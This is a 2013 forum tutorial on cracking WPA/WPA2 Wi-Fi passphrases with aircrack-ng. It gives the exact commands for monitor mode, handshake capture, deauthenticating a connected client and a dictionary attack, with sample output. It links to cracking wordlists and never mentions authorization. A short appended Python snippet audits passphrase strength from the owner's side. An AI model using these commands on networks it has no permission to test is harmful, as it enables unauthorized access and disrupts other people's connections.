 Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]

sameer_bhola
Post subject: Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]   Thu Jan 03, 2013 11:27 pm

Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]
Note: This is part 1 of the tutorial, covering the bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our forum. The tools required for this tutorial are provided at the bottom of this tutorial.
This tutorial will teach you about cracking wpa/wpa2 networks which use pre-shared keys. But before jumping directly to the tutorial, i guess u guys should know about WPA/WPA2 and the difference between WEP and WPA. If u dont have any idea on this topic, then i would suggest you read some articles about WPA/WPA2 and WEP, thats going to help you a lot.
Before starting, make sure airodump-ng shows the network having the PSK authentication type. If not, then stop wasting ur time cracking, because aircrack-ng can only crack pre-shared keys.
I also got asked several times whether we can crack WPA like WEP and the answer i gave was NO, because while cracking WEP, statistical methods can be used to speed up cracking, but WPA only depends upon BRUTE-FORCING (there's an exception though, which i will be showing in Part-2 of cracking wpa/wpa2 networks).

So here are the points you should note down:

1) The passphrase or password must be in the dictionary list u are going to use for brute-forcing.
2) The authentication methods of WPA and WPA2 networks are almost the same, so there is no difference between cracking WPA and WPA2.
3) You should be close enough to the network to send and receive wireless client packets.

The steps we are going to follow are:
1) Put wireless interface in monitor mode.
2) Start airodump-ng to collect authentication Handshake.
3) Use aireplay-ng, to deauthenticate the wireless client, after the handshake is captured.
4) Crack the key using a dictionary file by running aircrack-ng.
Putting wireless interface in monitor mode
To put the card in monitor mode, run the following command.
Quote: airmon-ng
Then the system will show this,

Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
Enter the following command to start the wireless card in monitor mode (for mac drivers).
Quote: airmon-ng start wlan0
Then the system will respond,
Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Enter the following command to start the wireless card in monitor mode (for other drivers).
Quote: airmon-ng start ardha
Replace ardha with your interface name.
Now, finding network using WPA/WPA2

In the step above, monitor mode has been enabled on mon0; note down ur monitor-enabled interface.
Then enter the following command (replace mon0 with ur monitor-enabled interface):

Quote: airodump-ng mon0
The system will respond,
Quote: CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
In the screen above, notice the “WPA handshake: 00:19:5B:52:AD:F7” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.
Now, lets de-authenticate using aireplay-ng after the handshake is complete.

Quote: aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
The output should be,
Quote: 13:04:20 Sending DeAuth to station. STMAC: [00:1C:BF:90:5B:A3]
Now, lets run aircrack-ng to crack the pre-shared key.
Quote: aircrack-ng -w mypassword.lst -b 00:19:5B:52:AD:F7 psk*.cap
Where:
-w mypassword.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
If everything is working good and handshakes are found, this is what u are likely to get

Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:19:5B:52:AD:F7 testnet WPA (1 handshake)
Choosing first network as target.
If handshakes are not found then,
Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Now, aircrack-ng will start attempting to crack the pre-shared key. Depending on ur computer speed and the size of the password file, cracking may take up to hours and even days.
If everything goes good then this is what cracked pre-shared key looks like:
Aircrack-ng 0.8

Quote: [00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
And, thats the end of the Tutorial.
Download aircrack from :

[You must be registered and logged in to see this link.]
Collection of wordlist(size:8.49gb) :
[You must be registered and logged in to see this link.]
Collection of wordlist(size:1.9gb) :
[You must be registered and logged in to see this link.]
OR, you can use your own wordlists, if u already have one.
Note: This is part 1 of the tutorial, covering the bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our Forum.
Copyright © Ardhapagal
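
Point 1 of the post means the dictionary attack only succeeds when the passphrase is in the wordlist, so a network owner can check a passphrase against that same condition. The following is an added example, not part of the original post: the wordlist entries and function names are constructed for illustration, and the default rate is the 37.20 k/s from the sample output above, read as keys per second.

```python
import string

# Constructed stand-in for a cracking dictionary (not the post's wordlists).
SAMPLE_WORDLIST = {"12345678", "password", "qwertyuiop", "iloveyou1", "testnet123"}
SYMBOLS = 33  # printable ASCII (95 chars) minus 52 letters and 10 digits


def charset_size(passphrase):
    """Size of the smallest character pool covering every character used."""
    pools = (string.ascii_lowercase, string.ascii_uppercase, string.digits)
    size = sum(len(pool) for pool in pools if any(c in pool for c in passphrase))
    if any(not c.isalnum() for c in passphrase):
        size += SYMBOLS
    return size


def audit_psk(passphrase, ssid, wordlist=SAMPLE_WORDLIST, keys_per_sec=37.2):
    """Audit one WPA/WPA2 passphrase from the owner's side.

    keys_per_sec defaults to the rate in the post's sample output; this is an
    assumption, since the real rate depends on the attacker's hardware.
    """
    printable = all(32 <= ord(c) <= 126 for c in passphrase)
    if not (8 <= len(passphrase) <= 63 and printable):
        return {"valid": False, "findings": ["not 8-63 printable ASCII characters"],
                "keyspace": 0, "days_to_exhaust": 0.0}
    findings = []
    if passphrase in wordlist:
        findings.append("present in wordlist")  # the condition in point 1
    if ssid and ssid.lower() in passphrase.lower():
        findings.append("contains the SSID")
    if passphrase.isdigit():
        findings.append("digits only")
    # Worst-case exhaustive search over the pool; irrelevant once the
    # passphrase is in a wordlist, because then it falls almost immediately.
    keyspace = charset_size(passphrase) ** len(passphrase)
    return {"valid": True, "findings": findings, "keyspace": keyspace,
            "days_to_exhaust": keyspace / keys_per_sec / 86400}


if __name__ == "__main__":
    for psk in ("12345678", "testnet123", "cobalt-Heron-47-mistral"):
        print(psk, audit_psk(psk, "TestNet"))
```

The key found in the sample output, 12345678, is flagged on two counts, while a long mixed passphrase that appears in no wordlist produces no findings.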